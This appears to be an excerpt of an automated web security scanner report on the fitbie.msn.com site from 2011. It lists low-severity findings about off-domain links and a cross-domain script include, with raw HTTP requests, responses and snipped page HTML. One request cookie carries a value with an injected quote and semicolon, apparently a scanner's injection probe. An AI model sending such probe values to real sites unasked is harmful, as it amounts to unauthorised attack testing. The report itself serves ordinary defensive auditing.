<a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99¢ an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go ></a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.5. http://fitbie.msn.com/videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos/

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/videos/?vid=

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://images.rodale.com/dca/400Cal-navButton.gif
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.myhomemsn.com/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine
https://shop.fitbie.com/

Request

GET /videos/?vid= HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:03 +0000
ETag: "1297607343-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42696
Expires: Mon, 14 Feb 2011 02:28:44 GMT
Date: Sun, 13 Feb 2011 14:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
<a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99¢ an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go ></a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

5. Cross-domain script include previous next
There are 52 instances of this issue:

/
/cardio/seize-your-saturdays
/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make
/fitness-tips/tips/10-bizarre-side-effects-exercise
/get-fit/anytime-anywhere-yoga
/get-fit/belly-abs
/get-fit/cardio
/get-fit/fitness-tips
/get-fit/men
/get-fit/strength-training
/get-fit/tips/3-get-closer-couple-stretches
/get-fit/tips/6-hard-body-winter-sports
/get-fit/tips/best-workouts-every-mood/tip/4
/get-fit/tips/feel-good-fitness-strategies
/get-fit/walking
/get-fit/women
/get-fit/yoga
/look-and-feel-thinner/3-abs-myths-busted
/look-better-naked-2-day-cleanse
/lose-weight
/lose-weight/after
/lose-weight/fat-burning-workouts
/meal-plan/lose-weight-400-calorie-meals
/men/toughness-challenge
/node/4411
/slideshow/10-grab-and-go-fitness-foods
/slideshow/11-reasons-spring-should-come-sooner
/slideshow/12-ways-make-water-less-boring
/slideshow/30-second-weight-loss-tricks
/slideshow/8-ridiculously-cheap-healthy-foods
/slideshow/9-cutting-edge-abs-exercises
/slideshow/amazing-weight-loss-success
/slideshow/build-perfect-home-gym
/slideshow/food-face
/slideshow/secrets-slim
/slideshow/they-lost-weight-together
/slideshow/why-being-single-better-your-body
/videos
/videos/
/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat
/workout/15-minute-workout-strengthen-your-body-and-mind
/workout/3-moves-rev-your-metabolism
/workout/bob-harpers-fat-blasting-workout
/workout/lose-last-10-pounds
/workout/mens-health-muscle-system
/workout/muscle-memory-workout
/workout/small-changes-big-results
/workout/transform-your-body-strength-workout-d
/workout/transform-your-body-strength-workout-e
/workout/transform-your-body-strength-workout-f
/workout/your-instant-beach-body
/workouts-men/trimming-tools

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://fitbie.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297577225-1"
Last-Modified: Sun, 13 Feb 2011 06:07:05 +0000
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Feb 2011 14:22:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 66330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.2. http://fitbie.msn.com/cardio/seize-your-saturdays previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/cardio/seize-your-saturdays

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /cardio/seize-your-saturdays HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.3. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/fitness-tips/tips/10-bizarre-side-effects-exercise

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /fitness-tips/tips/10-bizarre-side-effects-exercise HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297600923-1"
Last-Modified: Sun, 13 Feb 2011 12:42:03 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=36664
Expires: Mon, 14 Feb 2011 00:48:20 GMT
Date: Sun, 13 Feb 2011 14:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/anytime-anywhere-yoga

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/anytime-anywhere-yoga HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:02:18 +0000
ETag: "1297458138-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42795
Expires: Sat, 12 Feb 2011 09:02:41 GMT
Date: Fri, 11 Feb 2011 21:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.6. http://fitbie.msn.com/get-fit/belly-abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/belly-abs

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/belly-abs HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
